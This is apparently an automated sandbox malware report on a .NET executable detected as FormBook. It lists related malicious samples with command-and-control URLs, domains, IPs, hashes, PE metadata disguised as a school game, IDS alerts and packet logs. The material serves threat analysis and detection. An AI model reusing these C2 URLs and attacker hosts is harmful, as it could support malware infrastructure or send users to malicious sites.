                                                      • www.claimyourhome.com/m4np/?K8Ll=VrfkUzCgDOsNw7vcJHyKSHRd9mo6P8zEBKzHyIuPkwjCnY+Nl5Qz8SVDGCPVzVWsfETz&j48=6lEh7nxPx
                                                      BA-CONTRACT 312000123 SSR ADVICE 31-05-2021.xlsxGet hashmaliciousBrowse
                                                      • www.newmopeds.com/p2io/?blVD=u0D0A44HgXZtWLTP&m8lpij=bSK1RxPMHjVQe9mhMJ2LeA3okZHmhG3V4GBmTatllgIVkFsFULHDN3EeY50sHAiR0AoDRA==
                                                      rove.exeGet hashmaliciousBrowse
                                                      • www.droneservicescalifornia.com/aipc/?bv4=QtGcShyq3hM0tmzNR1O/iqeGgTsxlY0zNLFT9Roz30za6F4nrsW4sOk0NZaczfkltNl3&6lSp=ArO83PE0Mh0TtZa0
                                                      item.exeGet hashmaliciousBrowse
                                                      • www.vaginalmedicine.com/m3rc/?Ntipth=llyx&s864=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTfcXael2pAlq
                                                      PP05492110.exeGet hashmaliciousBrowse
                                                      • www.winnipegwebdesigners.com/3edq/?0VMpQLt=j6hslNEQJPAVvjaOLLEjXAx9dXQUFsZcczIoxk2Yy06r67OJvuHcSxzhVJvHnPvx93wF&j2Mpk=aDKPkfspe
                                                      HEN.exeGet hashmaliciousBrowse
                                                      • www.droneservicescalifornia.com/aipc/?6l=mnSl&TlPt=QtGcShyq3hM0tmzNR1O/iqeGgTsxlY0zNLFT9Roz30za6F4nrsW4sOk0NZWcgPom0dlhN3UP/g==
                                                      DHL_119045_Receipt document,pdf.exeGet hashmaliciousBrowse
                                                      • www.daitemik.com/vfm2/?tzr8=K3bXKI2WBuoazjVceC2H9ZNG/kfIZngKuMaSpcljAIAw5bMpxWrOz9kTo7anyDypC2AUk7DH7A==&2d=mlyx
                                                      COVID-19-Related Requirements.exeGet hashmaliciousBrowse
                                                      • www.portablesteamsaunas.com/cgsp/?zR-4q=wCZjRreTETPxpz3yzi5aMK9lgrBwWrXWegbflPnh9KjaaDHMPgi5SZz4hafy+YGLKOgeKwGRDg==&hB0=D8yhC83P6d34H
                                                      N20210526.exeGet hashmaliciousBrowse
                                                      • www.fortwayneduiattorney.com/cca/?nRYXM4=DQkKoy4PFhxvpfy0yA/zfG9zgCj3jVN+xnbFtEbC29HfrQWL+0F/38DF1Au9lzaxthz4&D8OLc=wh38e8H0rf
                                                      Po_23456.pdf.exeGet hashmaliciousBrowse
                                                      • www.diamondpolishingtools.com/gad0/?V4=inHXLVZPo&wPN=v3qsT70juIFjFhXaN1zc5giFJQsg+jwtwalemn0+QVkKIDmC7h+wc477+cDBqmBfEGWj
                                                      DHL4198278Err-PDF.exeGet hashmaliciousBrowse
                                                      • www.whizbets.com/ubqx/?VR-T5=lhf8xpGpMnD8mnA&XR-xe0lh=qbpbcgrgrphYC+6vw+rR3rVPLZfPDXctKQyllVhhIijJLSCUP09c2csQ37Z/zesXfed47+3oQw==

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      www.hazard-protection.comqXDtb88hht.exeGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      17jLieeOPx.exeGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      KWX1rM9GB0.exeGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      Contract MAY2021.xlsxGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      k7AgZOwF4S.exeGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      o52k2obPCG.exeGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      uNttFPI36y.exeGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      pumYguna1i.exeGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      g0g865fQ2S.exeGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      mar2403.xlsxGet hashmaliciousBrowse
                                                      • 148.59.128.71
                                                      www.dmgt4m2g8y2uh.nettzeEeC2CBA.exeGet hashmaliciousBrowse
                                                      • 103.120.12.40
                                                      ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                      • 103.120.12.94
                                                      GoRnrfZlAG.exeGet hashmaliciousBrowse
                                                      • 103.120.13.150
                                                      bin.exeGet hashmaliciousBrowse
                                                      • 103.120.13.158
                                                      b02c0831_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 103.120.13.202
                                                      6d56768e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 103.120.13.189
                                                      RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                      • 103.120.12.236
                                                      lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                      • 103.120.12.218
                                                      NMpDBwHJP8.exeGet hashmaliciousBrowse
                                                      • 103.120.12.151
                                                      lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                                      • 103.120.12.251
                                                      pumYguna1i.exeGet hashmaliciousBrowse
                                                      • 103.120.12.151
                                                      gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                      • 103.120.12.245
                                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                      • 103.120.12.153
                                                      Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                      • 103.94.151.135
                                                      50729032021.xlsxGet hashmaliciousBrowse
                                                      • 103.94.151.208
                                                      www.yunlimall.comDNPr7t0GMY.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      IsIMH5zplo.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      7LQAaB3oH4.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      bin.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      feAfWrgHcX.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      5PthEm83NG.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      Introduction APRIL 15 2020.xlsxGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      u87sEvt9v3.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      g0g865fQ2S.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      ZwNJI24QAf.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      AMAZON-02USOrderKLB210568.exeGet hashmaliciousBrowse
                                                      • 34.215.126.147
                                                      q7jxy6gZMb.exeGet hashmaliciousBrowse
                                                      • 104.192.141.1
                                                      b9f5bca9a22f08aad48674bc42e4eaf72ab8aa3d652ba.exeGet hashmaliciousBrowse
                                                      • 52.219.158.14
                                                      8BDBD0yy0q.apkGet hashmaliciousBrowse
                                                      • 52.17.153.103
                                                      8BDBD0yy0q.apkGet hashmaliciousBrowse
                                                      • 13.224.195.88
                                                      ehDnx4Ke5d.exeGet hashmaliciousBrowse
                                                      • 3.22.15.135
                                                      KY4cmAI0jU.exeGet hashmaliciousBrowse
                                                      • 3.34.12.41
                                                      c71fd2gJus.exeGet hashmaliciousBrowse
                                                      • 52.219.64.3
                                                      XQehPgTn35.exeGet hashmaliciousBrowse
                                                      • 3.136.65.236
                                                      E1a92ARmPw.exeGet hashmaliciousBrowse
                                                      • 35.157.179.180
                                                      crt9O3URua.exeGet hashmaliciousBrowse
                                                      • 35.157.179.180
                                                      E1a92ARmPw.exeGet hashmaliciousBrowse
                                                      • 52.218.105.219
                                                      DNPr7t0GMY.exeGet hashmaliciousBrowse
                                                      • 13.59.53.244
                                                      lTAPQJikGw.exeGet hashmaliciousBrowse
                                                      • 99.83.154.118
                                                      SKlGhwkzTi.exeGet hashmaliciousBrowse
                                                      • 44.227.65.245
                                                      SecuriteInfo.com.Trojan.Packed2.43183.29557.exeGet hashmaliciousBrowse
                                                      • 13.59.53.244
                                                      Letter 1019.xlsxGet hashmaliciousBrowse
                                                      • 18.140.1.169
                                                      #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                      • 143.204.98.37
                                                      Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                      • 75.2.26.18
                                                      U03c2doc.exeGet hashmaliciousBrowse
                                                      • 108.128.238.226
                                                      EGIHOSTINGUSDNPr7t0GMY.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      lLJGwAgWDh.exeGet hashmaliciousBrowse
                                                      • 104.252.75.149
                                                      Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                      • 104.164.109.43
                                                      tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      RFQ.exeGet hashmaliciousBrowse
                                                      • 136.0.84.126
                                                      ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                      • 104.252.121.237
                                                      U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      IsIMH5zplo.exeGet hashmaliciousBrowse
                                                      • 142.111.47.2
                                                      SOA #093732.exeGet hashmaliciousBrowse
                                                      • 172.120.222.45
                                                      Invoice.exeGet hashmaliciousBrowse
                                                      • 107.165.45.157
                                                      CC for account.exeGet hashmaliciousBrowse
                                                      • 107.165.149.13
                                                      SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                      • 104.253.112.105
                                                      HQvI0y1Wu4.exeGet hashmaliciousBrowse
                                                      • 107.165.37.235
                                                      KAZOX MATERIALS SDN BHD Purchase Order.exeGet hashmaliciousBrowse
                                                      • 172.120.222.52
                                                      CONTRACT 312000H123 SSR ADVICE 31-05-2021 (1).xlsxGet hashmaliciousBrowse
                                                      • 104.252.121.237
                                                      003 SOA.exeGet hashmaliciousBrowse
                                                      • 104.164.224.68
                                                      Items and Specification Needed for RFQ546092227865431209PDF.exeGet hashmaliciousBrowse
                                                      • 45.38.86.100
                                                      SKMBT_C22421033008180 png.exeGet hashmaliciousBrowse
                                                      • 104.252.192.27
                                                      Swift copy_9808.exeGet hashmaliciousBrowse
                                                      • 107.164.104.228
                                                      BIT-ISLEEquinixJpapanEnterpriseKKJPye4nYRzxJa.exeGet hashmaliciousBrowse
                                                      • 103.120.12.94
                                                      tgb4.exeGet hashmaliciousBrowse
                                                      • 103.109.252.105
                                                      GoRnrfZlAG.exeGet hashmaliciousBrowse
                                                      • 103.120.13.150
                                                      bin.exeGet hashmaliciousBrowse
                                                      • 103.120.13.158
                                                      b02c0831_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 103.120.13.202
                                                      vZMIGFMR.exeGet hashmaliciousBrowse
                                                      • 103.120.15.179
                                                      6d56768e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 103.120.13.189
                                                      RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                      • 103.120.12.236
                                                      lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                      • 103.120.12.218
                                                      NMpDBwHJP8.exeGet hashmaliciousBrowse
                                                      • 103.120.12.151
                                                      pumYguna1i.exeGet hashmaliciousBrowse
                                                      • 103.120.12.151
                                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                      • 103.120.12.153
                                                      Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                      • 103.94.151.135
                                                      50729032021.xlsxGet hashmaliciousBrowse
                                                      • 103.94.151.208
                                                      PROJ3144534685007.exeGet hashmaliciousBrowse
                                                      • 103.192.160.224
                                                      orii11.exeGet hashmaliciousBrowse
                                                      • 103.192.160.203
                                                      bnb.exeGet hashmaliciousBrowse
                                                      • 103.192.160.244
                                                      SecuriteInfo.com.Trojan.Inject4.6572.18135.exeGet hashmaliciousBrowse
                                                      • 103.109.255.90
                                                      RFQ SECO WARWICK Germany.docGet hashmaliciousBrowse
                                                      • 202.59.235.199
                                                      https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343Get hashmaliciousBrowse
                                                      • 202.131.200.84

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UOMp9cDcqZ.exe.log
                                                      Process:C:\Users\user\Desktop\UOMp9cDcqZ.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1314
                                                      Entropy (8bit):5.350128552078965
                                                      Encrypted:false
                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.859694041798628
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:UOMp9cDcqZ.exe
                                                      File size:993792
                                                      MD5:15d907e7d9f8286e5053796c9d78fcec
                                                      SHA1:b7d7329e94e2292ed53e2778cebec533ac599030
                                                      SHA256:771e4f69520f71afe6a6e9a4eb4de7dcd8d7521d90db290ca6c27b1a95c532af
                                                      SHA512:c11d01a61f3dab5923cc7c2a64eae2732b5633376d3ef3f9fdf6a0e59567226eca74b84e4cad49da87f6538b6c42c7f7a98a552c12e7b0917e6ff5f81d09f02e
                                                      SSDEEP:24576:vo2y0RBSy/DrDoqbg1L+8XAaIXqziNeBUdt:vXNzrrDoeg1qYBIOiwBU
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..`..............P..............=... ...@....@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:00828e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4f3d1a
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x60C1DD5B [Thu Jun 10 09:37:31 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xf3cc80x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x680.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xf60000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xf3b900x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xf1d200xf1e00False0.883397932817data7.86649805273IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xf40000x6800x800False0.34375data3.58059982943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xf60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_VERSION0xf40900x3f0SysEx File - OctavePlateau
                                                      RT_MANIFEST0xf44900x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightCopyright Sutton Grammar School 2015
                                                      Assembly Version1.0.0.0
                                                      InternalNameOrderablePartitioner.exe
                                                      FileVersion1.0.0.0
                                                      CompanyNameSutton Grammar School
                                                      LegalTrademarks
                                                      Comments
                                                      ProductNameAspiring Rookie - Basketball
                                                      ProductVersion1.0.0.0
                                                      FileDescriptionAspiring Rookie - Basketball
                                                      OriginalFilenameOrderablePartitioner.exe

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      06/11/21-16:57:51.970759TCP1201ATTACK-RESPONSES 403 Forbidden8049719103.120.12.113192.168.2.5
                                                      06/11/21-16:58:02.278377TCP1201ATTACK-RESPONSES 403 Forbidden804972734.102.136.180192.168.2.5
                                                      06/11/21-16:58:07.403292TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.552.58.78.16
                                                      06/11/21-16:58:07.403292TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.552.58.78.16
                                                      06/11/21-16:58:07.403292TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.552.58.78.16

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jun 11, 2021 16:57:45.441020966 CEST4971880192.168.2.5142.111.47.2
                                                      Jun 11, 2021 16:57:45.639610052 CEST8049718142.111.47.2192.168.2.5
                                                      Jun 11, 2021 16:57:45.639869928 CEST4971880192.168.2.5142.111.47.2
                                                      Jun 11, 2021 16:57:45.640141010 CEST4971880192.168.2.5142.111.47.2
                                                      Jun 11, 2021 16:57:45.838773012 CEST8049718142.111.47.2192.168.2.5
                                                      Jun 11, 2021 16:57:45.838835955 CEST8049718142.111.47.2192.168.2.5
                                                      Jun 11, 2021 16:57:45.839091063 CEST4971880192.168.2.5142.111.47.2
                                                      Jun 11, 2021 16:57:45.839256048 CEST4971880192.168.2.5142.111.47.2
                                                      Jun 11, 2021 16:57:46.036894083 CEST8049718142.111.47.2192.168.2.5
                                                      Jun 11, 2021 16:57:51.388333082 CEST4971980192.168.2.5103.120.12.113
                                                      Jun 11, 2021 16:57:51.679419994 CEST8049719103.120.12.113192.168.2.5
                                                      Jun 11, 2021 16:57:51.679626942 CEST4971980192.168.2.5103.120.12.113
                                                      Jun 11, 2021 16:57:51.679858923 CEST4971980192.168.2.5103.120.12.113
                                                      Jun 11, 2021 16:57:51.970685005 CEST8049719103.120.12.113192.168.2.5
                                                      Jun 11, 2021 16:57:51.970758915 CEST8049719103.120.12.113192.168.2.5
                                                      Jun 11, 2021 16:57:51.970772028 CEST8049719103.120.12.113192.168.2.5
                                                      Jun 11, 2021 16:57:51.970964909 CEST4971980192.168.2.5103.120.12.113
                                                      Jun 11, 2021 16:57:51.971105099 CEST4971980192.168.2.5103.120.12.113
                                                      Jun 11, 2021 16:57:52.261929035 CEST8049719103.120.12.113192.168.2.5
                                                      Jun 11, 2021 16:58:02.097131014 CEST4972780192.168.2.534.102.136.180
                                                      Jun 11, 2021 16:58:02.139584064 CEST804972734.102.136.180192.168.2.5
                                                      Jun 11, 2021 16:58:02.139719963 CEST4972780192.168.2.534.102.136.180
                                                      Jun 11, 2021 16:58:02.140011072 CEST4972780192.168.2.534.102.136.180
                                                      Jun 11, 2021 16:58:02.182245970 CEST804972734.102.136.180192.168.2.5
                                                      Jun 11, 2021 16:58:02.278377056 CEST804972734.102.136.180192.168.2.5
                                                      Jun 11, 2021 16:58:02.278445005 CEST804972734.102.136.180192.168.2.5
                                                      Jun 11, 2021 16:58:02.278543949 CEST4972780192.168.2.534.102.136.180
                                                      Jun 11, 2021 16:58:02.282665014 CEST4972780192.168.2.534.102.136.180
                                                      Jun 11, 2021 16:58:02.324836016 CEST804972734.102.136.180192.168.2.5
                                                      Jun 11, 2021 16:58:07.360459089 CEST4972880192.168.2.552.58.78.16
                                                      Jun 11, 2021 16:58:07.402939081 CEST804972852.58.78.16192.168.2.5
                                                      Jun 11, 2021 16:58:07.403177023 CEST4972880192.168.2.552.58.78.16
                                                      Jun 11, 2021 16:58:07.403291941 CEST4972880192.168.2.552.58.78.16
                                                      Jun 11, 2021 16:58:07.445632935 CEST804972852.58.78.16192.168.2.5
                                                      Jun 11, 2021 16:58:07.445677042 CEST804972852.58.78.16192.168.2.5
                                                      Jun 11, 2021 16:58:07.445689917 CEST804972852.58.78.16192.168.2.5
                                                      Jun 11, 2021 16:58:07.445919991 CEST4972880192.168.2.552.58.78.16
                                                      Jun 11, 2021 16:58:07.445959091 CEST4972880192.168.2.552.58.78.16
                                                      Jun 11, 2021 16:58:07.488323927 CEST804972852.58.78.16192.168.2.5
                                                      Jun 11, 2021 16:58:12.533590078 CEST4972980192.168.2.578.31.67.91
                                                      Jun 11, 2021 16:58:12.589776993 CEST804972978.31.67.91192.168.2.5
                                                      Jun 11, 2021 16:58:12.590086937 CEST4972980192.168.2.578.31.67.91
                                                      Jun 11, 2021 16:58:12.590209007 CEST4972980192.168.2.578.31.67.91
                                                      Jun 11, 2021 16:58:12.645725012 CEST804972978.31.67.91192.168.2.5
                                                      Jun 11, 2021 16:58:12.645829916 CEST804972978.31.67.91192.168.2.5
                                                      Jun 11, 2021 16:58:12.645905018 CEST4972980192.168.2.578.31.67.91
                                                      Jun 11, 2021 16:58:12.812756062 CEST804972978.31.67.91192.168.2.5
                                                      Jun 11, 2021 16:58:12.812885046 CEST4972980192.168.2.578.31.67.91
                                                      Jun 11, 2021 16:58:13.082334042 CEST4972980192.168.2.578.31.67.91
                                                      Jun 11, 2021 16:58:13.135490894 CEST804972978.31.67.91192.168.2.5
                                                      Jun 11, 2021 16:58:13.496877909 CEST804972978.31.67.91192.168.2.5
                                                      Jun 11, 2021 16:58:13.496973038 CEST4972980192.168.2.578.31.67.91
                                                      Jun 11, 2021 16:58:18.381213903 CEST4973180192.168.2.5148.59.128.71
                                                      Jun 11, 2021 16:58:18.538333893 CEST8049731148.59.128.71192.168.2.5
                                                      Jun 11, 2021 16:58:18.538448095 CEST4973180192.168.2.5148.59.128.71
                                                      Jun 11, 2021 16:58:18.538600922 CEST4973180192.168.2.5148.59.128.71
                                                      Jun 11, 2021 16:58:18.697585106 CEST8049731148.59.128.71192.168.2.5
                                                      Jun 11, 2021 16:58:18.697621107 CEST8049731148.59.128.71192.168.2.5
                                                      Jun 11, 2021 16:58:18.697837114 CEST4973180192.168.2.5148.59.128.71
                                                      Jun 11, 2021 16:58:18.697937012 CEST4973180192.168.2.5148.59.128.71
                                                      Jun 11, 2021 16:58:18.854981899 CEST8049731148.59.128.71192.168.2.5

                                                      UDP Packets

